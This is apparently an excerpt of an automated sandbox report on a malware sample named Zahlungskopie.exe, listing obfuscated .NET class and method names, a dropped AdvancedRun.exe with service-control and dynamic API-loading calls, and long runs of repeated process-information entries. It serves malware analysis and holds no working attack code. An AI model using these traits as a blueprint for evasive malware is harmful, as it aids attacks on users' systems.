              Source: 17.0.Zahlungskopie.exe.1e0000.0.unpack, EyZTsSvYLRhPfexadI/MxZOaQWKTAURmBQTieArYFZawVbxqldLjouCuPLcV.csHigh entropy of concatenated method names: 'HwqDiLEnYEbLs', 'OUhWjFqOFl', 'XyicTjeVNkYduOCXCKCoHngjtopganNRvtWI', '.ctor', '.cctor', 'URjMzdVbzHtEkTpryYkYOn', 'oBxSgQhuORpklXKqBbWmQNsKaboXNlWcWyXGcUkrnEMUJ', 'etNhwibCwAiNRe', 'BjxbGtiozMJzhM', 'UDiGPrXVjPqcVzXP'
              Source: 17.0.Zahlungskopie.exe.1e0000.0.unpack, EyZTsSvYLRhPfexadI/KHzUCwMEcEcAVMVeAPJOwQpV.csHigh entropy of concatenated method names: 'get_IOAmKpwiEnAUAVuONIRnSmXEOl', 'get_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', 'set_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', '.ctor', '.cctor', 'trMvThSMWAPicKuvVIWiMyGrwSlNDieXnkVz', 'DIAxSEvMnoaKLyLOnlHTfexoHZtsLkOAyVsmiypicTdiRAc', 'fwpJcDbuylQTldbczAmQfyGPVyRlbow', 'gWoVwBMXwAUbWHwXZSaIrnmZXIUgekj', 'xXOJWhFBMDPplxKhzBRsaFfTKoYNGFSlrwehXAaSnzWNyWO'
              Source: 17.0.Zahlungskopie.exe.1e0000.0.unpack, EyZTsSvYLRhPfexadI/DpuOWGqcixGcjEqmPlEMDjqwzCTJywlJcdLlDAxOuUC.csHigh entropy of concatenated method names: 'NXmwAzDYLIuafeswexsKbushgTfIoNP', '.ctor', 'xmdXAXQWOTVMPXIYbCDmzVoaJYDPjbgvCLPXJrlDfHOoB', 'eVfsdhNIjBXdnBuaNMAkdhLoKqZgSgayFdxfTtNtBnZGdJie', 'UbCbTRXGOxIcruXEIyWDHTtNRCULIHGQbXfxLlAQrwWeqkScb', 'vlmBnhjocpdVgQRbtpzhWmwMqwxIArcJGlvEzKYoi', 'JWxVlGfnpQDCUyYQOXKMGCXalzE', 'unBJqlYnqYReQrvlBygLNwOKNnCgYwJLbKaNgm', 'rWlIRXSTulrwCfNRYyQWcIvgrChtOGvxumOPCNXMUthrPCUEX', 'kMBXkjJAeroQyfOPUbprYpkBeb'
              Source: 17.0.Zahlungskopie.exe.1e0000.0.unpack, EyZTsSvYLRhPfexadI/MZbgkSVWpRbyCsAHycUWTrOSxWGpEkcTmojxPn.csHigh entropy of concatenated method names: 'GjdYGbCfuyoVkvTAVljIomFrfOiloidSIPnMQtiRVQm', '.ctor', 'hJFlNFDKXCFvLnquzpqDmlTIF', 'DkhrgnfRrXyQdfNfGzJTC', 'sbxpHtyRHVPXGkvwtRpzE', 'tpSEvkCyFLkPckiKbyTHZ', 'KbJSxUsJnItXZLFLmjVtbkEhDamLrsvSEJojLXpkOsdQ', 'vflwfqmKLGJReKUgXVpYBspxvaoTLEIgOMxOQGafLgYa', 'weacvdRwOSTMVYJqYRacaKpYwfqVjmvupbrZlxHNmsVS', 'LTRXKhUfWaMPbGqNABFyrGXrqMtsoOstfLly'
              Source: 17.0.Zahlungskopie.exe.1e0000.0.unpack, PxSCePQMbEoKBmtQYyPYaMgBNscjQIRMPKCElPQXnvnpZHvMt/HOprFdrRBptzRhiPMosM.csHigh entropy of concatenated method names: '.cctor', 'wrNkAPaGiYGXkxUupmcTYmiXANEYZouAcOwlxqgBtkgWT', 'AZdQGYgXZkiPJNkbGTEgVvbIWZgAzObcbGnFUiHvtfP', 'mdHGsrDqBQYeYuTHSGxlifOdAE', 'hyliMPGOFptNilLAlHiHzoaDMHDdXTCSNk', 'etdixjOEnfxpZwFCvrXHjlFaicKIvQUvYgHhizLxK', 'JMyosEHrhBPCVTNcauygjxkcqSPytWGzWzygLPy', 'dqeJtFvlNtfyqYEApnmb', 'MRTXkUpFwuGrkW', 'uPeNRwVHbenxqAsYiTzOMmxhyqPtMOotEOv'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, EyZTsSvYLRhPfexadI/LZOzpTcZilphUsgoqwIFl.csHigh entropy of concatenated method names: '.ctor', 'cNKGwtsetjYpNrgPKkyOIeTUPHwgWGdhOcXWeKflHpauh', 'efpVfdJqtJRMHLWXwDUiZpjSGzsDatdyNHDqRbAaxyIne', 'rduoKTxAZiPWwpGLgpaFt', 'YZhFfucULBGVOovXoqz', 'GYOzOuvMUpqiILtemJEyuGnHibIak', 'NSZAZukAtlKIiEusYncVrKFLblsARFtNLJByjhIriETxTQm', 'bTpkNFfTcnzOcKIOSXWydWiQELMNRhRk', 'YrGCuFhFPzkVITpxVfFWTNXguiTtgkfvoQKdft', 'mPqJELmiLwoRMCVqktJw'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, EyZTsSvYLRhPfexadI/MxZOaQWKTAURmBQTieArYFZawVbxqldLjouCuPLcV.csHigh entropy of concatenated method names: 'HwqDiLEnYEbLs', 'OUhWjFqOFl', 'XyicTjeVNkYduOCXCKCoHngjtopganNRvtWI', '.ctor', '.cctor', 'URjMzdVbzHtEkTpryYkYOn', 'oBxSgQhuORpklXKqBbWmQNsKaboXNlWcWyXGcUkrnEMUJ', 'etNhwibCwAiNRe', 'BjxbGtiozMJzhM', 'UDiGPrXVjPqcVzXP'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, EyZTsSvYLRhPfexadI/KHzUCwMEcEcAVMVeAPJOwQpV.csHigh entropy of concatenated method names: 'get_IOAmKpwiEnAUAVuONIRnSmXEOl', 'get_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', 'set_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', '.ctor', '.cctor', 'trMvThSMWAPicKuvVIWiMyGrwSlNDieXnkVz', 'DIAxSEvMnoaKLyLOnlHTfexoHZtsLkOAyVsmiypicTdiRAc', 'fwpJcDbuylQTldbczAmQfyGPVyRlbow', 'gWoVwBMXwAUbWHwXZSaIrnmZXIUgekj', 'xXOJWhFBMDPplxKhzBRsaFfTKoYNGFSlrwehXAaSnzWNyWO'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, EyZTsSvYLRhPfexadI/DpuOWGqcixGcjEqmPlEMDjqwzCTJywlJcdLlDAxOuUC.csHigh entropy of concatenated method names: 'NXmwAzDYLIuafeswexsKbushgTfIoNP', '.ctor', 'xmdXAXQWOTVMPXIYbCDmzVoaJYDPjbgvCLPXJrlDfHOoB', 'eVfsdhNIjBXdnBuaNMAkdhLoKqZgSgayFdxfTtNtBnZGdJie', 'UbCbTRXGOxIcruXEIyWDHTtNRCULIHGQbXfxLlAQrwWeqkScb', 'vlmBnhjocpdVgQRbtpzhWmwMqwxIArcJGlvEzKYoi', 'JWxVlGfnpQDCUyYQOXKMGCXalzE', 'unBJqlYnqYReQrvlBygLNwOKNnCgYwJLbKaNgm', 'rWlIRXSTulrwCfNRYyQWcIvgrChtOGvxumOPCNXMUthrPCUEX', 'kMBXkjJAeroQyfOPUbprYpkBeb'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, EyZTsSvYLRhPfexadI/MZbgkSVWpRbyCsAHycUWTrOSxWGpEkcTmojxPn.csHigh entropy of concatenated method names: 'GjdYGbCfuyoVkvTAVljIomFrfOiloidSIPnMQtiRVQm', '.ctor', 'hJFlNFDKXCFvLnquzpqDmlTIF', 'DkhrgnfRrXyQdfNfGzJTC', 'sbxpHtyRHVPXGkvwtRpzE', 'tpSEvkCyFLkPckiKbyTHZ', 'KbJSxUsJnItXZLFLmjVtbkEhDamLrsvSEJojLXpkOsdQ', 'vflwfqmKLGJReKUgXVpYBspxvaoTLEIgOMxOQGafLgYa', 'weacvdRwOSTMVYJqYRacaKpYwfqVjmvupbrZlxHNmsVS', 'LTRXKhUfWaMPbGqNABFyrGXrqMtsoOstfLly'
              Source: 18.2.Zahlungskopie.exe.830000.1.unpack, PxSCePQMbEoKBmtQYyPYaMgBNscjQIRMPKCElPQXnvnpZHvMt/HOprFdrRBptzRhiPMosM.csHigh entropy of concatenated method names: '.cctor', 'wrNkAPaGiYGXkxUupmcTYmiXANEYZouAcOwlxqgBtkgWT', 'AZdQGYgXZkiPJNkbGTEgVvbIWZgAzObcbGnFUiHvtfP', 'mdHGsrDqBQYeYuTHSGxlifOdAE', 'hyliMPGOFptNilLAlHiHzoaDMHDdXTCSNk', 'etdixjOEnfxpZwFCvrXHjlFaicKIvQUvYgHhizLxK', 'JMyosEHrhBPCVTNcauygjxkcqSPytWGzWzygLPy', 'dqeJtFvlNtfyqYEApnmb', 'MRTXkUpFwuGrkW', 'uPeNRwVHbenxqAsYiTzOMmxhyqPtMOotEOv'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, EyZTsSvYLRhPfexadI/LZOzpTcZilphUsgoqwIFl.csHigh entropy of concatenated method names: '.ctor', 'cNKGwtsetjYpNrgPKkyOIeTUPHwgWGdhOcXWeKflHpauh', 'efpVfdJqtJRMHLWXwDUiZpjSGzsDatdyNHDqRbAaxyIne', 'rduoKTxAZiPWwpGLgpaFt', 'YZhFfucULBGVOovXoqz', 'GYOzOuvMUpqiILtemJEyuGnHibIak', 'NSZAZukAtlKIiEusYncVrKFLblsARFtNLJByjhIriETxTQm', 'bTpkNFfTcnzOcKIOSXWydWiQELMNRhRk', 'YrGCuFhFPzkVITpxVfFWTNXguiTtgkfvoQKdft', 'mPqJELmiLwoRMCVqktJw'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, EyZTsSvYLRhPfexadI/KHzUCwMEcEcAVMVeAPJOwQpV.csHigh entropy of concatenated method names: 'get_IOAmKpwiEnAUAVuONIRnSmXEOl', 'get_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', 'set_JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu', '.ctor', '.cctor', 'trMvThSMWAPicKuvVIWiMyGrwSlNDieXnkVz', 'DIAxSEvMnoaKLyLOnlHTfexoHZtsLkOAyVsmiypicTdiRAc', 'fwpJcDbuylQTldbczAmQfyGPVyRlbow', 'gWoVwBMXwAUbWHwXZSaIrnmZXIUgekj', 'xXOJWhFBMDPplxKhzBRsaFfTKoYNGFSlrwehXAaSnzWNyWO'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, EyZTsSvYLRhPfexadI/MxZOaQWKTAURmBQTieArYFZawVbxqldLjouCuPLcV.csHigh entropy of concatenated method names: 'HwqDiLEnYEbLs', 'OUhWjFqOFl', 'XyicTjeVNkYduOCXCKCoHngjtopganNRvtWI', '.ctor', '.cctor', 'URjMzdVbzHtEkTpryYkYOn', 'oBxSgQhuORpklXKqBbWmQNsKaboXNlWcWyXGcUkrnEMUJ', 'etNhwibCwAiNRe', 'BjxbGtiozMJzhM', 'UDiGPrXVjPqcVzXP'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, EyZTsSvYLRhPfexadI/DpuOWGqcixGcjEqmPlEMDjqwzCTJywlJcdLlDAxOuUC.csHigh entropy of concatenated method names: 'NXmwAzDYLIuafeswexsKbushgTfIoNP', '.ctor', 'xmdXAXQWOTVMPXIYbCDmzVoaJYDPjbgvCLPXJrlDfHOoB', 'eVfsdhNIjBXdnBuaNMAkdhLoKqZgSgayFdxfTtNtBnZGdJie', 'UbCbTRXGOxIcruXEIyWDHTtNRCULIHGQbXfxLlAQrwWeqkScb', 'vlmBnhjocpdVgQRbtpzhWmwMqwxIArcJGlvEzKYoi', 'JWxVlGfnpQDCUyYQOXKMGCXalzE', 'unBJqlYnqYReQrvlBygLNwOKNnCgYwJLbKaNgm', 'rWlIRXSTulrwCfNRYyQWcIvgrChtOGvxumOPCNXMUthrPCUEX', 'kMBXkjJAeroQyfOPUbprYpkBeb'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, EyZTsSvYLRhPfexadI/MZbgkSVWpRbyCsAHycUWTrOSxWGpEkcTmojxPn.csHigh entropy of concatenated method names: 'GjdYGbCfuyoVkvTAVljIomFrfOiloidSIPnMQtiRVQm', '.ctor', 'hJFlNFDKXCFvLnquzpqDmlTIF', 'DkhrgnfRrXyQdfNfGzJTC', 'sbxpHtyRHVPXGkvwtRpzE', 'tpSEvkCyFLkPckiKbyTHZ', 'KbJSxUsJnItXZLFLmjVtbkEhDamLrsvSEJojLXpkOsdQ', 'vflwfqmKLGJReKUgXVpYBspxvaoTLEIgOMxOQGafLgYa', 'weacvdRwOSTMVYJqYRacaKpYwfqVjmvupbrZlxHNmsVS', 'LTRXKhUfWaMPbGqNABFyrGXrqMtsoOstfLly'
              Source: 18.0.Zahlungskopie.exe.830000.0.unpack, PxSCePQMbEoKBmtQYyPYaMgBNscjQIRMPKCElPQXnvnpZHvMt/HOprFdrRBptzRhiPMosM.csHigh entropy of concatenated method names: '.cctor', 'wrNkAPaGiYGXkxUupmcTYmiXANEYZouAcOwlxqgBtkgWT', 'AZdQGYgXZkiPJNkbGTEgVvbIWZgAzObcbGnFUiHvtfP', 'mdHGsrDqBQYeYuTHSGxlifOdAE', 'hyliMPGOFptNilLAlHiHzoaDMHDdXTCSNk', 'etdixjOEnfxpZwFCvrXHjlFaicKIvQUvYgHhizLxK', 'JMyosEHrhBPCVTNcauygjxkcqSPytWGzWzygLPy', 'dqeJtFvlNtfyqYEApnmb', 'MRTXkUpFwuGrkW', 'uPeNRwVHbenxqAsYiTzOMmxhyqPtMOotEOv'
              Source: C:\Users\user\Desktop\Zahlungskopie.exeFile created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00408E31
              Source: C:\Users\user\Desktop\Zahlungskopie.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
